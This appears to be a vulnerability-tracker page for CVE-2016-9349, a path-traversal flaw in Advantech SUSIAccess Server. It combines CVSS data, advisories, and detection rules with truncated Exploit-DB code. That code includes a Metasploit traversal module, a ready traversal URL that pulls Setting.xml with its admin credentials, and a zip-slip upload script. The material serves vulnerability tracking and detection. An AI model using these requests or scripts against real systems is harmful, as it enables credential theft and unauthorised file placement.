CVE-2016-9349
published 2017-02-13CVE-2016-9349: An issue was discovered in Advantech SUISAccess Server Version 3.0 and prior. An attacker could traverse the file system and extract files that can result in…
PriorityP357high7.5CVSS 3.0
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
7.88%
94.0th percentile
An issue was discovered in Advantech SUISAccess Server Version 3.0 and prior. An attacker could traverse the file system and extract files that can result in information disclosure.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| advantech | susiaccess | <= 3.0 | — |
Detection & IOCsextracted from sources · hover to see the quote
urlhttp://<target>:8080/downloadCSV.jsp?file=../../../../../../../../../../Program%20Files\Advantech\SUSIAccess%203.0%20Server\Setting.xml↗
- →Detect directory traversal attempts against the /downloadCSV.jsp endpoint using repeated '../' sequences in the 'file' parameter, particularly with a leading '/' followed by multiple '../' repetitions. ↗
- →Monitor HTTP GET requests to /downloadCSV.jsp on port 8080 with a 'file' parameter containing path traversal sequences ('../') or URL-encoded equivalents ('%2F', '%2E%2E'). ↗
- →Alert on HTTP POST requests to /webresources/AccountMgmt/Login on port 8080 with both 'Authorization: Basic' and 'X-Requested-With: XMLHttpRequest' headers, which is the login step of the exploit chain. ↗
- →Detect multipart/form-data file upload requests to the SUSIAccess server on port 8080 containing a zip file named 'update.zip', which is the malicious zip used in the exploit. ↗
- →Flag retrieval of Setting.xml via the /downloadCSV.jsp traversal path, as it contains encrypted admin credentials that can be reversed due to a static hard-coded key. ↗
- →Monitor for zip files containing entries with leading '../' path traversal sequences (zip-slip pattern), specifically targeting the AcronisInstaller.exe filename placed at traversal depth of 10 levels. ↗
- ·The traversal depth defaults to 10 levels ('/' + '../' * 10), but the DEPTH option is configurable by the attacker, meaning traversal sequences of varying lengths should all be detected. ↗
- ·The default target file is 'boot.ini' but the FILE option is fully attacker-controlled, so any file path may appear in the traversal request — do not rely on specific filenames for detection. ↗
- ·The admin password is encrypted with a static hard-coded key, meaning any attacker who retrieves Setting.xml via the traversal vulnerability can offline-decrypt the admin credentials. ↗
- ·Spaces in file paths are URL-encoded as '%20' by the exploit before being sent in the request URI. ↗
CVSS provenance
nvdv3.07.5HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-2qpx-8vpw-42x9: An issue was discovered in Advantech SUISAccess Server Version 3
ghsa_unreviewed·2022-05-17
CVE-2016-9349 [HIGH] CWE-200 GHSA-2qpx-8vpw-42x9: An issue was discovered in Advantech SUISAccess Server Version 3
An issue was discovered in Advantech SUISAccess Server Version 3.0 and prior. An attacker could traverse the file system and extract files that can result in information disclosure.
CISA ICS
Advantech SUSIAccess Server Vulnerabilities
cisa_ics·2016-12-01·CVSS 7.5
[HIGH] Advantech SUSIAccess Server Vulnerabilities
## Archived Content In an effort to keep CISA.gov current, the archive contains outdated information that may not reflect current policy or programs.
ICS Advisory
##
Advantech SUSIAccess Server Vulnerabilities
Last RevisedDecember 01, 2016
Alert CodeICSA-16-336-04
## OVERVIEW
Researcher rgod working with Zero Day Initiative (ZDI) has identified an information disclosure, a directory traversal, and a privilege escalation vulnerability in Advantech’s SUSIAccess Server. Advantech has produced new software to mitigate these vulnerabilities.
These vulnerabilities could be exploited remotely.
## AFFECTED PRODUCTS
The following SUSIAccess Server versions are affected:
- SUISAccess Server Version 3.0 and prior.
## IMPACT
Successful exploitatio
No detection rules found.
Exploit-DB
Advantech SUSIAccess < 3.0 - Directory Traversal / Information Disclosure (Metasploit)
exploitdb·2017-08-01
CVE-2016-9349 Advantech SUSIAccess < 3.0 - Directory Traversal / Information Disclosure (Metasploit)
Advantech SUSIAccess 'Advantech SUSIAccess Server Directory Traversal Information Disclosure',
'Description' => %q{
This module exploits an information disclosure vulnerability found in
Advantech SUSIAccess [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2016-9349' ],
[ 'ZDI', '16-628' ],
[ 'BID', '94629' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-336-04' ]
],
'DisclosureDate' => 'Dec 13 2016'))
register_options(
[
OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 10]),
OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']),
Opt::RPORT(8080)
], self.class )
end
def run
depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
levels = "/" + ("../" * depth)
file = "#{levels}#{datast
Exploit-DB
Advantech SUSIAccess < 3.0 - 'RecoveryMgmt' File Upload
exploitdb·2017-08-01·CVSS 7.5
CVE-2016-9351 [HIGH] Advantech SUSIAccess < 3.0 - 'RecoveryMgmt' File Upload
Advantech SUSIAccess \r\n"
post_data cookies,
'Authorization' => "Basic #{creds[0].to_s}",
'X-Requested-With' => "XMLHttpRequest",
'Content-Type' => "multipart/form-data; boundary=#{bound}",
'User-Agent' => "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0",
'Accept-Language' => "en-US,en;q=0.5",
'Accept' => "text/plain, */*; q=0.01",
'Connection' => "close"
})
req.body = post_data.join
http = Net::HTTP.new("#{target}", 8080)
res = http.start {|http| http.request(req)}
if res.code =~ /200/
puts "[+] Upload successful!"
end
end
def craftZip(target, payload)
path = "../../../../../../../../../../Program%20Files\\Advantech\\SUSIAccess%203.0%20Server\\Setting.xml"
uri = URI("http://#{target}:8080/downloadCSV.jsp?file=#{path}")
res = Net::HTTP.get_response(uri)
xml = No
No writeups or analysis indexed.
http://www.securityfocus.com/bid/94629https://ics-cert.us-cert.gov/advisories/ICSA-16-336-04https://www.exploit-db.com/exploits/42401/https://www.exploit-db.com/exploits/42402/http://www.securityfocus.com/bid/94629https://ics-cert.us-cert.gov/advisories/ICSA-16-336-04https://www.exploit-db.com/exploits/42401/https://www.exploit-db.com/exploits/42402/
2017-02-13
Published